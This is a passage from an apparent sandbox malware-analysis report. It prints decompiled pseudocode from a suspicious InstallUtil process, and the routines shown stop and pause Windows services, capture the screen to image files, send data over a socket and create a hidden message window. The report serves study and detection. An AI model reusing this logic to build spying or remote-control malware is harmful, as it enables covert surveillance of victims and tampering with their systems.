                                                                      								_t11 = E00444852(_t27, _t37, __eflags,  *0x46c1cc, _t32);
                                                                      								__eflags = _t11;
                                                                      								if(_t11 != 0) {
                                                                      									E004440C7(_t27, _t32, 0x46d654);
                                                                      									E004427C2(_t21);
                                                                      									__eflags = _t32;
                                                                      									if(_t32 != 0) {
                                                                      										goto L19;
                                                                      									} else {
                                                                      										goto L18;
                                                                      									}
                                                                      								} else {
                                                                      									_push(_t32);
                                                                      									goto L14;
                                                                      								}
                                                                      							} else {
                                                                      								_push(_t21);
                                                                      								L14:
                                                                      								E004427C2();
                                                                      								L18:
                                                                      								SetLastError(_t37);
                                                                      							}
                                                                      						} else {
                                                                      							_t32 = E004447FC(_t25, _t37, _t45, _t9);
                                                                      							if(_t32 != 0) {
                                                                      								L19:
                                                                      								SetLastError(_t37);
                                                                      								_t21 = _t32;
                                                                      							} else {
                                                                      								goto L12;
                                                                      							}
                                                                      						}
                                                                      						return _t21;
                                                                      					}
                                                                      				} else {
                                                                      					_t31 = E004447FC(_t23, _t36, _t42, _t2);
                                                                      					if(_t31 != 0) {
                                                                      						L8:
                                                                      						SetLastError(_t36);
                                                                      						return _t31;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      Statement addresses (IDA plugin column, one entry per statement of the listing above in listing order; 0x00000000 where the plugin assigns no address):
                                                                      0x00444255 0x00444255 0x00444255 0x0044425f 0x00444261 0x00444266 0x00444269 0x00444277 0x0044427e 0x00444283 0x00444286 0x00444289 0x0044429b 0x004442a0 0x004442a2 0x004442ad 0x004442b4 0x004442b9 0x004442bc 0x004442be 0x00000000 0x00000000 0x00000000 0x00000000 0x004442a4 0x004442a4 0x00000000 0x004442a4 0x0044428b 0x0044428b 0x0044428c 0x0044428c 0x00444291 0x004442cc 0x004442cd 0x004442d3 0x004442d8 0x004442db 0x004442dc 0x004442dd 0x004442e4 0x004442e6 0x004442e8 0x004442ed 0x004442f0 0x004442fe 0x0044430a 0x0044430d 0x00444310 0x00444322 0x00444327 0x00444329 0x00444334 0x0044433a 0x00444342 0x00444344 0x00000000 0x00000000 0x00000000 0x00000000 0x0044432b 0x0044432b 0x00000000 0x0044432b 0x00444312 0x00444312 0x00444313 0x00444313 0x00444346 0x00444347 0x00444347 0x004442f2 0x004442f8 0x004442fc 0x0044434f 0x00444350 0x00444356 0x00000000 0x00000000 0x00000000 0x004442fc 0x0044435d 0x0044435d 0x0044426b 0x00444271 0x00444275 0x004442c0 0x004442c1 0x004442cb 0x00000000 0x00000000 0x00000000 0x00444275

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
                                                                      • _free.LIBCMT ref: 0044428C
                                                                      • _free.LIBCMT ref: 004442B4
                                                                      • SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442C1
                                                                      • SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
                                                                      • _abort.LIBCMT ref: 004442D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: b1307c93ddf9507e0e4d6fca6a33c4fc371b4ac402e4da2ecf8816b9163aca1a
                                                                      • Instruction ID: 88808196462d03fdc4b6c03d2974d154c1a5feaca9f0faec2f71f660e385fb11
                                                                      • Opcode Fuzzy Hash: b1307c93ddf9507e0e4d6fca6a33c4fc371b4ac402e4da2ecf8816b9163aca1a
                                                                      • Instruction Fuzzy Hash: B2F0CD3660470126F2113376BC06B6B2515ABD27BDF35026BF61497293EFEDCC41456D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Stops a service by name (companion of E004174F6 above, same E00401EC4/E00401EC9
                                                                      			// string helpers). Returns nonzero if the stop request was accepted; the SERVICE_STATUS
                                                                      			// written to _v32 is never examined, so a return of 1 does not mean the service has
                                                                      			// actually stopped. A service entering the stopped state is recorded by the Service
                                                                      			// Control Manager as System event 7036.
                                                                      			E00417324(char _a4) {
                                                                      				struct _SERVICE_STATUS _v32;
                                                                      				signed int _t16;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      
                                                                      				_t16 = 0;
                                                                      				_t20 = OpenSCManagerW(0, 0, 0x20); // 0x20 as an SCM right is SC_MANAGER_MODIFY_BOOT_CONFIG (same numeric value as SERVICE_STOP below)
                                                                      				_t19 = OpenServiceW(_t20, E00401EC4( &_a4), 0x20); // 0x20 = SERVICE_STOP
                                                                      				if(_t19 != 0) {
                                                                      					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000; // 1 = SERVICE_CONTROL_STOP
                                                                      					CloseServiceHandle(_t20);
                                                                      					CloseServiceHandle(_t19);
                                                                      				} else {
                                                                      					CloseServiceHandle(_t20);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				return _t16;
                                                                      			}
                                                                      0x0041732f
                                                                      0x0041733e
                                                                      0x0041734d
                                                                      0x00417351
                                                                      0x00417372
                                                                      0x00417375
                                                                      0x00417378
                                                                      0x00417353
                                                                      0x00417354
                                                                      0x00417354
                                                                      0x0041737d
                                                                      0x0041738a

                                                                      APIs
                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00416EA1,00000000), ref: 00417333
                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00416EA1,00000000), ref: 00417347
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417354
                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00416EA1,00000000), ref: 00417363
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417375
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416EA1,00000000), ref: 00417378
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                      • String ID:
                                                                      • API String ID: 221034970-0
                                                                      • Opcode ID: aa950793e07e51a1e59a6bb1f25f5afc73491ee93f79d447db5bcdaa7598f71f
                                                                      • Instruction ID: f0d7bf5e26bd831e518b811c1ee1ccc879f402e6dffc6db71acbd568de72c4d3
                                                                      • Opcode Fuzzy Hash: aa950793e07e51a1e59a6bb1f25f5afc73491ee93f79d447db5bcdaa7598f71f
                                                                      • Instruction Fuzzy Hash: 82F0C2325043187BD2106B65EC89EBF3B7CDB85B6AB100026FE05961D2DA28CD8695F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0041748F(char _a4) {
                                                                      				struct _SERVICE_STATUS _v32;
                                                                      				signed int _t16;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      
                                                                      				_t16 = 0;
                                                                      				_t20 = OpenSCManagerW(0, 0, 0x40);
                                                                      				_t19 = OpenServiceW(_t20, E00401EC4( &_a4), 0x40);
                                                                      				if(_t19 != 0) {
                                                                      					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                                                                      					CloseServiceHandle(_t20);
                                                                      					CloseServiceHandle(_t19);
                                                                      				} else {
                                                                      					CloseServiceHandle(_t20);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				return _t16;
                                                                      			}
                                                                      0x0041749a
                                                                      0x004174a9
                                                                      0x004174b8
                                                                      0x004174bc
                                                                      0x004174dd
                                                                      0x004174e0
                                                                      0x004174e3
                                                                      0x004174be
                                                                      0x004174bf
                                                                      0x004174bf
                                                                      0x004174e8
                                                                      0x004174f5

                                                                      APIs
                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00416DA1,00000000), ref: 0041749E
                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00416DA1,00000000), ref: 004174B2
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416DA1,00000000), ref: 004174BF
                                                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00416DA1,00000000), ref: 004174CE
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416DA1,00000000), ref: 004174E0
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416DA1,00000000), ref: 004174E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                      • String ID:
                                                                      • API String ID: 221034970-0
                                                                      • Opcode ID: 6666f2f330381e7dacfe183742ddf6315ec43087dc8b280ffa6ef286a89e3d2c
                                                                      • Instruction ID: 98f123d3c9bfd057a7262e957c8ab876c6d8e47b3b40811f7c9f2c5a750fd6a8
                                                                      • Opcode Fuzzy Hash: 6666f2f330381e7dacfe183742ddf6315ec43087dc8b280ffa6ef286a89e3d2c
                                                                      • Instruction Fuzzy Hash: 00F0C8715042187BD2116B65EC45DBF3F7CDB85766F100026FE09961D2DA28CD8685F9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00416668(void* __ecx, void* __edx, void* __eflags) {
                                                                      				char _v1048;
                                                                      				char _v1056;
                                                                      				char _v1092;
                                                                      				void* _v1096;
                                                                      				char _v1112;
                                                                      				char _v1120;
                                                                      				void* _v1124;
                                                                      				void* _v1136;
                                                                      				char _v1144;
                                                                      				char _v1152;
                                                                      				char _v1156;
                                                                      				void* _v1160;
                                                                      				char _v1184;
                                                                      				char _v1200;
                                                                      				void* _v1204;
                                                                      				char _v1224;
                                                                      				char _v1232;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t39;
                                                                      				void* _t54;
                                                                      				void* _t57;
                                                                      				void* _t60;
                                                                      				void* _t67;
                                                                      				void* _t73;
                                                                      				char* _t84;
                                                                      				char* _t86;
                                                                      				void* _t120;
                                                                      				void* _t121;
                                                                      				void* _t123;
                                                                      				intOrPtr* _t124;
                                                                      				void* _t128;
                                                                      				signed int _t129;
                                                                      				void* _t131;
                                                                      
                                                                      				_t134 = __eflags;
                                                                      				_t131 = (_t129 & 0xfffffff8) - 0x4b4;
                                                                      				_t121 = __ecx;
                                                                      				_t74 = __edx;
                                                                      				E00402FD4(__edx,  &_v1184, E0040413E(__edx,  &_v1156, __edx, _t128, __ecx), _t121, _t128, __eflags, L"png");
                                                                      				E00401EC9();
                                                                      				E0041578F( &_v1120, __edx, __eflags);
                                                                      				_t84 =  &_v1120;
                                                                      				_t39 =  *0x46dd04(E00401F6B(_t84), E0040243C(), 0, _t120, _t123, _t73);
                                                                      				_t124 = _t39;
                                                                      				E004151A8( &_v1144, _t124);
                                                                      				_t86 = L"image/png";
                                                                      				E00415B45(_t86,  &_v1112);
                                                                      				E0041521D(E00401EC4( &_v1200),  &_v1152, _t43,  &_v1112);
                                                                      				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
                                                                      				if( *((char*)(E00401F6B(E00401E25(0x46e600,  &_v1112, _t128, _t134, 0x1b)))) == 1) {
                                                                      					E0040209F(__edx,  &_v1224);
                                                                      					E00401EC4( &_v1200);
                                                                      					_t54 = E004189A5( &_v1224);
                                                                      					_t136 = _t54;
                                                                      					if(_t54 != 0) {
                                                                      						DeleteFileW(E00401EC4( &_v1200));
                                                                      						_t57 = E0040243C();
                                                                      						E00405AE8( &_v1048, E00401F6B(0x46e5e8), _t57);
                                                                      						_t60 = E0040243C();
                                                                      						E00405C09(_t74,  &_v1056,  &_v1224,  &_v1184, E00401F6B( &_v1232), _t60);
                                                                      						E00402FD4(_t74,  &_v1120, E0040413E(_t74,  &_v1092,  &_v1224, _t128, _t121), _t121, _t128, _t136, L"dat");
                                                                      						E00401EC9();
                                                                      						_t67 = E00401EC4( &_v1120);
                                                                      						E004020B6(_t74, _t131 - 0x18, _t64, _t136,  &_v1200);
                                                                      						E00418A12(_t67);
                                                                      						E00401EC9();
                                                                      						E00401F98();
                                                                      					}
                                                                      					_t48 = E00401F98();
                                                                      				}
                                                                      				E004151CB(_t48,  &_v1152);
                                                                      				E00401F98();
                                                                      				return E00401EC9();
                                                                      			}
                                                                      0x00416668
                                                                      0x0041666e
                                                                      0x00416677
                                                                      0x00416679
                                                                      0x00416690
                                                                      0x0041669a
                                                                      0x004166a7
                                                                      0x004166b7
                                                                      0x004166c1
                                                                      0x004166c8
                                                                      0x004166cf
                                                                      0x004166db
                                                                      0x004166e0
                                                                      0x004166fc
                                                                      0x00416704
                                                                      0x0041671d
                                                                      0x00416727
                                                                      0x00416730
                                                                      0x0041673b
                                                                      0x00416740
                                                                      0x00416742
                                                                      0x00416752
                                                                      0x0041675f
                                                                      0x00416774
                                                                      0x0041677d
                                                                      0x00416799
                                                                      0x004167b9
                                                                      0x004167c6
                                                                      0x004167d2
                                                                      0x004167e3
                                                                      0x004167ea
                                                                      0x004167f9
                                                                      0x00416802
                                                                      0x00416802
                                                                      0x0041680b
                                                                      0x0041680b
                                                                      0x00416814
                                                                      0x0041681d
                                                                      0x00416831

                                                                      APIs
                                                                        • Part of subcall function 0041578F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004157A9
                                                                        • Part of subcall function 0041578F: CreateCompatibleDC.GDI32(00000000), ref: 004157B6
                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004166C1
                                                                        • Part of subcall function 004151A8: GdipLoadImageFromStream.GDIPLUS(?,?,?,00415429,00000000), ref: 004151BC
                                                                        • Part of subcall function 0041521D: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000,00000000,00416701,00000000,?,?,00000000), ref: 0041522D
                                                                        • Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
                                                                      • DeleteFileW.KERNEL32(00000000,0000001B,?,00000000), ref: 00416752
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                                                                      • String ID: dat$image/png$png
                                                                      • API String ID: 1095564277-186023265
                                                                      • Opcode ID: 04a6251478f05b36b005a299042fa33135e0c409688e4b5a94aec16b5f099b03
                                                                      • Instruction ID: 3e21688c9afd0cf2381ecff5dda46a3937492d8886aa81b8262bb5068297ec44
                                                                      • Opcode Fuzzy Hash: 04a6251478f05b36b005a299042fa33135e0c409688e4b5a94aec16b5f099b03
                                                                      • Instruction Fuzzy Hash: 2B4130721183405AC315FB21DC569EFB3A8AF91348F40093FF546A71E2EF389A49C79A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00404C9A(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
                                                                      				char _v24;
                                                                      				char _v28;
                                                                      				char _v40;
                                                                      				void* _v44;
                                                                      				char _v48;
                                                                      				signed int _v52;
                                                                      				void* _v56;
                                                                      				char _v60;
                                                                      				char _v64;
                                                                      				intOrPtr _v68;
                                                                      				char _v76;
                                                                      				char _v80;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t35;
                                                                      				void* _t61;
                                                                      				void* _t65;
                                                                      				struct _SECURITY_ATTRIBUTES* _t67;
                                                                      				signed int _t73;
                                                                      				void* _t90;
                                                                      				_Unknown_base(*)()* _t92;
                                                                      				void* _t94;
                                                                      				void* _t96;
                                                                      				void* _t97;
                                                                      				void* _t98;
                                                                      
                                                                      				_t90 = __edx;
                                                                      				_t97 =  &_v56;
                                                                      				_v52 = _v52 & 0x00000000;
                                                                      				_t94 = __ecx;
                                                                      				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
                                                                      				E0040209F(_t65,  &_v48);
                                                                      				_t7 = _t94 + 0x58; // 0x46e2d0
                                                                      				_t35 = _t7;
                                                                      				_t92 = _a4;
                                                                      				while(E00404ED2(_t94, E00401F6B(_t92),  &_v52, _t35) != 0) {
                                                                      					_t10 = _t94 + 0x30; // 0x8
                                                                      					_t73 =  *_t10 & 0x000000ff;
                                                                      					_a12 = _t73;
                                                                      					_t96 = _v52 + _t73;
                                                                      					if(_t96 <= E0040243C()) {
                                                                      						_t67 = 0;
                                                                      						__eflags = 0;
                                                                      					} else {
                                                                      						_t67 = 1;
                                                                      						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040243C();
                                                                      					}
                                                                      					if(_t67 == 0) {
                                                                      						E00401FA2( &_v60, _t90, _t94, E00404162(_t92,  &_v24, _a12, 0xffffffff));
                                                                      						E00401F98();
                                                                      						E00401FA2( &_v76, _t90, _t94, E00404162( &_v64,  &_v40, 0, _v68));
                                                                      						E00401F98();
                                                                      						_t103 = _t67;
                                                                      						if(_t67 != 0) {
                                                                      							_t25 = _t94 + 0xc; // 0x46e284
                                                                      							E00401F80(_t25,  &_v80);
                                                                      							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
                                                                      							__eflags = 0;
                                                                      							CreateThread(0, 0, _a4, _t94, 0, 0);
                                                                      							_t28 = _t94 + 0x24; // 0x0
                                                                      							WaitForSingleObject( *_t28, 0xffffffff);
                                                                      							_t29 = _t94 + 0x24; // 0x0
                                                                      							CloseHandle( *_t29);
                                                                      						} else {
                                                                      							_t98 = _t97 - 0x18;
                                                                      							E004020B6(_t67, _t98, _t90, _t103,  &_v80);
                                                                      							_a4(_t94);
                                                                      							_t97 = _t98 + 0x1c;
                                                                      						}
                                                                      						E00401FA2(_t92, _t90, _t94, E00404162(_t92,  &_v28, _t96, 0xffffffff));
                                                                      						E00401F98();
                                                                      						_t61 = E0040243C();
                                                                      						_t32 = _t94 + 0x58; // 0x46e2d0
                                                                      						_t35 = _t32;
                                                                      						if(_t61 != 0) {
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				return E00401F98();
                                                                      			}
                                                                      0x00404c9a
                                                                      0x00404c9a
                                                                      0x00404c9d
                                                                      0x00404ca5
                                                                      0x00404cac
                                                                      0x00404cb0
                                                                      0x00404cb9
                                                                      0x00404cb9
                                                                      0x00404cbc
                                                                      0x00404cc0
                                                                      0x00404cdd
                                                                      0x00404cdd
                                                                      0x00404ce5
                                                                      0x00404ce9
                                                                      0x00404cf4
                                                                      0x00404d08
                                                                      0x00404d08
                                                                      0x00404cf6
                                                                      0x00404cf8
                                                                      0x00404d03
                                                                      0x00404d03
                                                                      0x00404d0c
                                                                      0x00404d29
                                                                      0x00404d32
                                                                      0x00404d50
                                                                      0x00404d59
                                                                      0x00404d62
                                                                      0x00404d64
                                                                      0x00404d7c
                                                                      0x00404d7f
                                                                      0x00404d90
                                                                      0x00404d93
                                                                      0x00404d9e
                                                                      0x00404da6
                                                                      0x00404da9
                                                                      0x00404daf
                                                                      0x00404db2
                                                                      0x00404d66
                                                                      0x00404d66
                                                                      0x00404d6c
                                                                      0x00404d72
                                                                      0x00404d76
                                                                      0x00404d76
                                                                      0x00404dca
                                                                      0x00404dd3
                                                                      0x00404dda
                                                                      0x00404de1
                                                                      0x00404de1
                                                                      0x00404de4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404de4
                                                                      0x00000000
                                                                      0x00404d0c
                                                                      0x00404dfa

                                                                      APIs
                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,0046E2D0), ref: 00404D8A
                                                                      • CreateThread.KERNEL32 ref: 00404D9E
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DA9
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DB2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                      • String ID: Cv
                                                                      • API String ID: 3360349984-4177205600
                                                                      • Opcode ID: 1217cf8e55ce48f58d1276ac7614cdbe116c8fa169b7e7139f6e5aa73c71365f
                                                                      • Instruction ID: a955660fc8b68b008618d99eb87fe80d3fde0e99a872e2c995a4ba911630cac4
                                                                      • Opcode Fuzzy Hash: 1217cf8e55ce48f58d1276ac7614cdbe116c8fa169b7e7139f6e5aa73c71365f
                                                                      • Instruction Fuzzy Hash: 5F4183B1204301AFC710FB62DC55D7FB7EDAFD5358F40093EB582A22E1DB3899098656
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00404A78(void* __ecx, void* __edx, void* __eflags, char _a4, char _a8) {
                                                                      				char _v12;
                                                                      				char _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t23;
                                                                      				void* _t38;
                                                                      				void* _t40;
                                                                      				void* _t46;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      				void* _t70;
                                                                      				void* _t71;
                                                                      
                                                                      				_t67 = __ecx;
                                                                      				_t23 = E0040243C();
                                                                      				_t68 = 4;
                                                                      				_v12 = _t23 + _t68;
                                                                      				E004051E3(0,  &_v36, __edx, __ecx, _t71, 0xc, 0);
                                                                      				_t4 = _t67 + 0x2c; // 0x46e2a4
                                                                      				E00433220(E004051BA(0), _t4, _t68);
                                                                      				E00433220(E004051BA(_t68),  &_v12, _t68);
                                                                      				E00433220(E004051BA(8),  &_a4, _t68);
                                                                      				_t10 =  &_a8; // 0x405454
                                                                      				L00403336(_t10);
                                                                      				if( *((intOrPtr*)(_t67 + 1)) != 0) {
                                                                      					_t16 = _t67 + 0x70; // 0x0
                                                                      					WaitForSingleObject( *_t16, 0xffffffff);
                                                                      					_push( &_v36);
                                                                      					_t38 = E0040243C();
                                                                      					_t40 = E0041DBAE(E00401F6B( &_v36), _t38);
                                                                      					_t20 = _t67 + 0x70; // 0x0
                                                                      					_t70 =  ==  ? 0xffffffff : _t40;
                                                                      					SetEvent( *_t20);
                                                                      				} else {
                                                                      					_t46 = E00401F6B( &_v36);
                                                                      					_t15 = _t67 + 4; // 0xffffffff
                                                                      					__imp__#19( *_t15, _t46, E0040243C(), 0);
                                                                      					_t70 = _t46;
                                                                      				}
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				return _t70;
                                                                      			}

                                                                      APIs
                                                                      • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      • WaitForSingleObject.KERNEL32(00000000,00000000,TT@s,?,?,00000004,?,?,00000004,?,0046E278,R@), ref: 00404B1E
                                                                      • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,0046E278,R@,?,?,?,?,?,00405454), ref: 00404B4C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EventObjectSingleWaitsend
                                                                      • String ID: TT@s$R@
                                                                      • API String ID: 3963590051-3366521986
                                                                      • Opcode ID: 1bfaf1815a1ae2dfa1d84171bf79883cc81e8456e78b5315919ff49e78cdf2db
                                                                      • Instruction ID: cef19ae2947ed44f79612548558f6db2e3a0f025ca0187bae19ad5cdadfcf086
                                                                      • Opcode Fuzzy Hash: 1bfaf1815a1ae2dfa1d84171bf79883cc81e8456e78b5315919ff49e78cdf2db
                                                                      • Instruction Fuzzy Hash: F62141729005197BDB04BBA1DC85DEFB73CFE14318F04453AF906B61E2EA78AA14C6A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 38%
                                                                      			E00417F9B(void* __edx) {
                                                                      				char _v12;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v40;
                                                                      				char _v44;
                                                                      				void* _v52;
                                                                      				void* _v60;
                                                                      				char _v64;
                                                                      				void* _v68;
                                                                      				void* _v76;
                                                                      				void* _t21;
                                                                      				void* _t22;
                                                                      				void* _t23;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      				void* _t36;
                                                                      
                                                                      				_t36 = __edx;
                                                                      				 *0x46deac( &_v12,  &_v36,  &_v44);
                                                                      				Sleep(0x3e8);
                                                                      				 *0x46deac( &_v32,  &_v40,  &_v64);
                                                                      				_t21 = E00418045();
                                                                      				_t22 = E00418045();
                                                                      				asm("sbb ebx, edx");
                                                                      				_t23 = E00418045();
                                                                      				asm("sbb ebx, edx");
                                                                      				_t24 = E00418045();
                                                                      				asm("adc ebx, edx");
                                                                      				_t25 = E00418045();
                                                                      				asm("sbb esi, edx");
                                                                      				_t26 = E00418045();
                                                                      				asm("adc esi, edx");
                                                                      				return E00452F70(E00452F30(_t21 - _t22 - _t23 + _t24 - _t25 + _t26, _t36, 0x64, 0), _t36, _t21 - _t22 - _t23 + _t24, _t36);
                                                                      			}

                                                                      APIs
                                                                      • GetSystemTimes.KERNEL32(?,?,?,0046E66C,?,?,00000000), ref: 00417FB1
                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00414300), ref: 00417FBC
                                                                      • GetSystemTimes.KERNEL32(?,?,?,?,?,00000000), ref: 00417FD1
                                                                      • __aulldiv.LIBCMT ref: 00418038
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: SystemTimes$Sleep__aulldiv
                                                                      • String ID: Rv
                                                                      • API String ID: 188215759-1554961537
                                                                      • Opcode ID: f13282ae7710d5f482574e8a99fb2f03a0c1c33a2c5390b4d67ff7d187a9c977
                                                                      • Instruction ID: b85cfcace345bbc5372e129741c6002aa5612915ee928d2ddd28b3df6cb5d97b
                                                                      • Opcode Fuzzy Hash: f13282ae7710d5f482574e8a99fb2f03a0c1c33a2c5390b4d67ff7d187a9c977
                                                                      • Instruction Fuzzy Hash: C01190735043486BC344FAB5CC84DEF7BACABC8344F050A3EB54682042EE69D64C8696
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E00419DF8() {
                                                                      				char _v20;
                                                                      				struct _WNDCLASSEXA _v68;
                                                                      				void* __edi;
                                                                      				struct HWND__* _t20;
                                                                      				void* _t23;
                                                                      
                                                                      				E004337A0(_t23,  &(_v68.style), 0, 0x2c);
                                                                      				_v68.cbSize = 0x30;
                                                                      				_v68.style = 0;
                                                                      				_v68.lpfnWndProc = E00419E78;
                                                                      				_v68.cbClsExtra = 0;
                                                                      				asm("movsd");
                                                                      				_v68.lpszClassName =  &_v20;
                                                                      				_v68.cbWndExtra = 0;
                                                                      				asm("movsd");
                                                                      				_v68.lpszMenuName = 0;
                                                                      				asm("movsd");
                                                                      				asm("movsw");
                                                                      				asm("movsb");
                                                                      				if(RegisterClassExA( &_v68) == 0) {
                                                                      					L3:
                                                                      					return 0;
                                                                      				}
                                                                      				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                                                      				if(_t20 == 0) {
                                                                      					GetLastError();
                                                                      					goto L3;
                                                                      				}
                                                                      				return _t20;
                                                                      			}

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                                      • String ID: 0$MsgWindowClass
                                                                      • API String ID: 2877667751-2410386613
